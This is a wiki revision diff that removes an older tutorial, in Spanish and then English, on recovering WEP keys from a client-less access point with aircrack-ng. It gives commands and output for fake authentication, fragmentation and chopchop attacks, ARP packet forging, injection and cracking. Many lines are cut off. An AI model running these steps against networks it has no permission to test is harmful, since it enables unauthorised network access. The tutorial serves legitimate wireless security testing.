spanish_how_to_crack_wep_with_no_clients
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
spanish_how_to_crack_wep_with_no_clients [2007/02/23 22:19] – spanish | spanish_how_to_crack_wep_with_no_clients [2009/08/14 18:25] (current) – --- mister_x | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Tutorial: Como crackear WEP sin clientes ====== | ||
- | Version: 1.02. de 10 de Febrero de 2007 | ||
- | By: darkAudax | ||
- | Video: http:// | ||
- | ===== Introducción ===== | ||
- | Hay muchas veces que encontramos redes wireless que no tienen clientes conectados. Este tutorial describe como obtener la clave WEP cuando no hay clientes. Aunque este tema ha sido discutido muchas veces en el Foro, este tutorial está hecho con la intención de entrar en más detalles y poner algunos ejemplos. | ||
- | |||
- | Es recomendable que cada uno experimente con su propio punto de acceso wireless, para familiarizarse con estas ideas y técnicas. Si no tienes un punto de acceso propio, recuerda que tienes que pedir permiso al propietario del router | ||
- | |||
- | Antes de nada hay que darles las gracias a los Desarrolladores de la suite Aircrack-ng por crear estas herramientas tan fantásticas. | ||
- | |||
- | Por favor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas serán bienvenidas. | ||
- | |||
- | |||
- | ===== Puntos de partida ===== | ||
- | |||
- | Suponemos que: | ||
- | |||
- | * Estás usando drivers parcheados para inyección. Puedes capturar paquetes con Wireshark para comprobar si estás inyectando. | ||
- | * Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP. | ||
- | * No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como " | ||
- | * El punto de acceso usa encriptación WEP abierta (open authentication). No funcionará si la autentificación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesitas el archivo PRGA xor para hacer una falsa autenticación de forma exitosa. | ||
- | * Usamos la versión 0.7 de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente. | ||
- | |||
- | Asegurate de que cumples todas las condiciones, | ||
- | |||
- | |||
- | ===== Equipo usado ===== | ||
- | |||
- | En este tutorial: | ||
- | |||
- | * Dirección MAC del PC ejecutando la suite aircrack-ng: | ||
- | * BSSID (dirección MAC del punto de acceso): 00: | ||
- | * ESSID (nombre de la red Wireless): teddy | ||
- | * Canal del AP: 9 | ||
- | * Interface Wireless: ath0 | ||
- | |||
- | Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos. | ||
- | |||
- | ===== Solución ===== | ||
- | |||
- | ==== Contenidos ==== | ||
- | |||
- | Aquí estań los pasos que vamos a seguir: | ||
- | |||
- | *1 - Fijar la dirección MAC de la tarjeta wireless | ||
- | *2 - Colocar la interface wireless en modo monitor y fijar el canal | ||
- | *3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso | ||
- | *4 - Usar chopchop o ataque de fragmentación para obtener PRGA | ||
- | *5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior | ||
- | *6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs | ||
- | *7 - Inyectar el paquete arp creado en el paso 5 | ||
- | *8 - Ejecutar aircrack-ng para obtener la clave WEP | ||
- | |||
- | |||
- | ==== Paso 1 - Fijar la dirección MAC de la tarjeta wireless ==== | ||
- | |||
- | Para ser honesto, nosotros no hemos cambiado la dirección MAC de nuestra tarjeta. | ||
- | |||
- | Esto es un recordatorio para que uses tu dirección MAC real y no una falsa. En el paso 3 es importante que la dirección MAC que se use sea la de la nuestra tarjeta, para realizar la falsa autenticación. Si quieres cambiar la dirección MAC de tu tarjeta puedes consultar este : post en inglés FAQ[[http:// | ||
- | |||
- | ==== Paso 2 - Colocar la interface wireless en modo monitor y fijar el canal ==== | ||
- | |||
- | Escribe el siguiente comando para poner la tarjeta wireless | ||
- | |||
- | airmon-ng start wifi0 9 | ||
- | |||
- | Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old. | ||
- | |||
- | El sistema nos responderá: | ||
- | |||
- | | ||
- | |||
- | | ||
- | | ||
- | |||
- | Puedes observar que “ath0” aparece colocada en modo monitor. | ||
- | |||
- | Escribe “ifconfig ath0 up” para levantar la interface ath0 que usaremos a continuación. | ||
- | |||
- | Para confirmar que la interface está bien configurada, | ||
- | |||
- | El sistema nos responderá: | ||
- | |||
- | | ||
- | |||
- | | ||
- | |||
- | | ||
- | |||
- | | ||
- | | ||
- | Bit Rate:0 kb/s | ||
- | | ||
- | | ||
- | Power Management: | ||
- | Link Quality=0/ | ||
- | Rx invalid nwid: | ||
- | Tx excessive retries: | ||
- | |||
- | Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en " | ||
- | |||
- | Para ver la correspondencia entre frecuencia y canal, mira: http:// | ||
- | |||
- | |||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | *If another interface started other then ath0 then you can use that one or use " | ||
- | |||
- | |||
- | |||
- | ==== Step 3 - Use aireplay-ng to do a fake authentication with the access point ==== | ||
- | |||
- | This is a very important step. | ||
- | |||
- | In order for an access point to accept a packet, the source MAC address must already be associated. | ||
- | |||
- | The lack of association with the access point is the single biggest reason why injection fails. | ||
- | |||
- | To associate with an access point, use fake authentication: | ||
- | |||
- | aireplay-ng -1 0 -e teddy -a 00: | ||
- | |||
- | Where: | ||
- | *-1 means fake authentication | ||
- | *0 reassociation timing in seconds | ||
- | *-e teddy is the wireless network name | ||
- | *-a 00: | ||
- | *-h 00: | ||
- | *ath0 is the wireless interface name | ||
- | |||
- | Success looks like: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | |||
- | Or another variation for picky access points: | ||
- | |||
- | aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00: | ||
- | |||
- | Where: | ||
- | * 6000 - Reauthenticate very 6000 seconds. | ||
- | * -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs. | ||
- | * -q 10 - Send keep alive packets every 10 seconds. | ||
- | |||
- | Success looks like: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | # and so on. | ||
- | |||
- | Here is an example of what a failed authentication looks like: | ||
- | 8: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | 18: | ||
- | |||
- | Notice the "Got a deauthentication packet" | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | *Some access points are configure to only allow selected MAC addresses to associate and connect. | ||
- | |||
- | *If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. | ||
- | | ||
- | Run: " | ||
- | |||
- | Here is a typical tcpdump error message you are looking for: | ||
- | |||
- | | ||
- | |||
- | Notice that the access point (00: | ||
- | |||
- | If you want to select only the DeAuth packets with tcpdump then you can use: " | ||
- | |||
- | |||
- | |||
- | ==== Step 4 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA ==== | ||
- | |||
- | The objective of the [[korek_chopchop|chopchop]] and [[fragmentation]] attacks is to obtain a PRGA (pseudo random genration algorithm) bit file. This PRGA is not the WEP key and cannot be used to decrypt packets. | ||
- | |||
- | Either chopchop or fragmentation attacks can be to obtain the PRGA bit file. The result is the same so use whichever one works for you. The pros and cons of each attack are described on the [[aircrack-ng]] page. | ||
- | |||
- | We will cover the fragmentation techninque first. | ||
- | |||
- | aireplay-ng -5 -b 00: | ||
- | |||
- | Where: | ||
- | *-5 means the fragmentation attack | ||
- | *-b 00: | ||
- | *-h 00: | ||
- | *ath0 is the wireless interface name | ||
- | |||
- | The system will respond: | ||
- | |||
- | | ||
- | | ||
- | Read 127 packets... | ||
- | |||
- | Size: 114, FromDS: 1, ToDS: 0 (WEP) | ||
- | |||
- | | ||
- | Dest. MAC = 01: | ||
- | | ||
- | |||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | |||
- | Use this packet ? y | ||
- | |||
- | When a packet from the access point arrives, enter " | ||
- | |||
- | When successful, the system reponds: | ||
- | |||
- | | ||
- | Data packet found! | ||
- | | ||
- | Got RELAYED packet!! | ||
- | Thats our ARP packet! | ||
- | | ||
- | Got RELAYED packet!! | ||
- | Thats our ARP packet! | ||
- | | ||
- | Got RELAYED packet!! | ||
- | Thats our ARP packet! | ||
- | | ||
- | Now you can build a packet with packetforge-ng out of that 1500 bytes keystream | ||
- | |||
- | Success! | ||
- | |||
- | If the fragmentation attack was not successful, you can then try the chopchop technique next. Run: | ||
- | |||
- | aireplay-ng -4 ath0 -h 00: | ||
- | |||
- | Where: | ||
- | *-4 means the chopchop attack | ||
- | *-h 00: | ||
- | *ath0 is the wireless interface name | ||
- | |||
- | The system responds: | ||
- | |||
- | Read 165 packets... | ||
- | | ||
- | Size: 86, FromDS: 1, ToDS: 0 (WEP) | ||
- | |||
- | | ||
- | Dest. MAC = FF: | ||
- | | ||
- | |||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | Use this packet ? y | ||
- | |||
- | You respond " | ||
- | |||
- | | ||
- | |||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | Sent 957 packets, current guess: B9... | ||
- | |||
- | The AP appears to drop packets shorter than 35 bytes. | ||
- | | ||
- | |||
- | | ||
- | | ||
- | |||
- | | ||
- | |||
- | Success! | ||
- | |||
- | === Helpful Tips === | ||
- | |||
- | *Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsquently generate a packet. | ||
- | *At home, to generate some packets to force chopchop to start, ping a non-existant IP on your network. | ||
- | *You can check decrypted packet by running " | ||
- | | ||
- | 19: | ||
- | *If something happens part way through chopchop, you can reuse the source packet by entering " | ||
- | *Taking the previous tip further, if you have a capture file from another session, you can use it as input " | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | * If the first packet you select does not work, then try a few others. Sometimes it takes more then one try to be successful with either attack. | ||
- | * The chopchop attack will not be successful on some access points. If this happens, move onto the fragmentation attack. | ||
- | * Make sure you are properly associated. To check this, follow the tcpdump instructions in step 2. | ||
- | |||
- | |||
- | ==== Step 5 - Use packetforge-ng to create an arp packet ==== | ||
- | |||
- | In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. | ||
- | |||
- | But first, lets generate the arp packet for injection by entering: | ||
- | |||
- | packetforge-ng -0 -a 00: | ||
- | |||
- | Where: | ||
- | *-0 means generate an arp packet | ||
- | *-a 00: | ||
- | *-h 00: | ||
- | *-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255) | ||
- | *-l 255.255.255.255.255 is the source IP (most APs respond to 255.255.255.255) | ||
- | *-y fragment-0203-180343.xor is file to read the PRGA from | ||
- | *-w arp-request is name of file to write the arp packet to | ||
- | |||
- | The system will respond: | ||
- | |||
- | Wrote packet to: arp-request | ||
- | |||
- | === Helpful Tips === | ||
- | |||
- | *After creating the packet, use tcpdump to review it from a sanity point of view. See below. | ||
- | |||
- | tcpdump -n -vvv -e -s0 -r arp-request | ||
- | | ||
- | | ||
- | | ||
- | |||
- | Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct. | ||
- | |||
- | Decrypt the packet: airdecap-ng -e teddy -w <put your WEP key here> arp-request | ||
- | View the decrypted packet: tcpdump -n -r arp-request-dec | ||
- | It should be something like: | ||
- | | ||
- | | ||
- | | ||
- | |||
- | |||
- | ==== Step 6 - Start airodump-ng ==== | ||
- | |||
- | Open another console session to capture the generated IVs. Then enter: | ||
- | |||
- | airodump-ng -c 9 --bssid 00: | ||
- | |||
- | Where: | ||
- | *-c 9 is the channel for the wireless network | ||
- | *--bssid 00: | ||
- | *--ivs specfifies that you only want to capture the IVs. This keeps the file as small as possible. | ||
- | *-w capture is file name prefix for the file which will contain the IVs. | ||
- | *ath0 is the interface name. | ||
- | |||
- | |||
- | ==== Step 7 - | ||
- | |||
- | Using the console session where you generated the arp packet, enter: | ||
- | |||
- | aireplay-ng -2 -r arp-request ath0 | ||
- | |||
- | Where: | ||
- | *-2 means use interactive frame selection | ||
- | *-r arp-request defines the file name from which to read the arp packet | ||
- | *ath0 defines the interface to use | ||
- | |||
- | The system will respond: | ||
- | |||
- | Size: 68, FromDS: 0, ToDS: 1 (WEP) | ||
- | | ||
- | | ||
- | Dest. MAC = FF: | ||
- | Source MAC = 00: | ||
- | | ||
- | 0x0000: | ||
- | 0x0010: | ||
- | 0x0020: | ||
- | 0x0030: | ||
- | 0x0040: | ||
- | | ||
- | Use this packet ? y | ||
- | |||
- | Enter " | ||
- | |||
- | | ||
- | You should also start airodump-ng to capture replies. | ||
- | |||
- | End of file. | ||
- | |||
- | While this command is successfully running, the airodump-ng screen will look similar to: | ||
- | |||
- | | ||
- | |||
- | BSSID PWR RXQ Beacons | ||
- | |||
- | 00: | ||
- | |||
- | BSSID STATION | ||
- | |||
- | 00: | ||
- | |||
- | You will notice that only one access point is being display since we included an airodump-ng filter to limit the capture to a single BSSID. | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | *If the BSSID data packets are not increasing make sure you are still associated with the access point. | ||
- | |||
- | |||
- | ==== Step 8 - Run aircrack-ng to obtain the WEP key ==== | ||
- | |||
- | Start another console session and enter: | ||
- | |||
- | aircrack-ng *.ivs -b 00: | ||
- | |||
- | Where: | ||
- | **.ivs selects all files ending in " | ||
- | *-b 00: | ||
- | |||
- | You can run this while generating packets. | ||
- | |||
- | Troubleshooting Tips: | ||
- | |||
- | *Sometimes you need to try various techniques to crack the WEP key. Try " | ||
- | |||
- | |||
- | =====Change Log ===== | ||
- | Februray 16/2007 | ||
- | * Added video from [[http:// | ||
- | |||
- | February 10/2007 v1.02 | ||
- | * Added the assumption with regards to open authentication | ||
- | |||
- | February 7/2007 v1.01 | ||
- | * Incorporated correction and feedback from cjaghblb | ||
- | |||
- | February 4/2007 v1.00 | ||
- | * Initial Release |
spanish_how_to_crack_wep_with_no_clients.1172265596.txt.gz · Last modified: 2007/02/23 22:19 (external edit)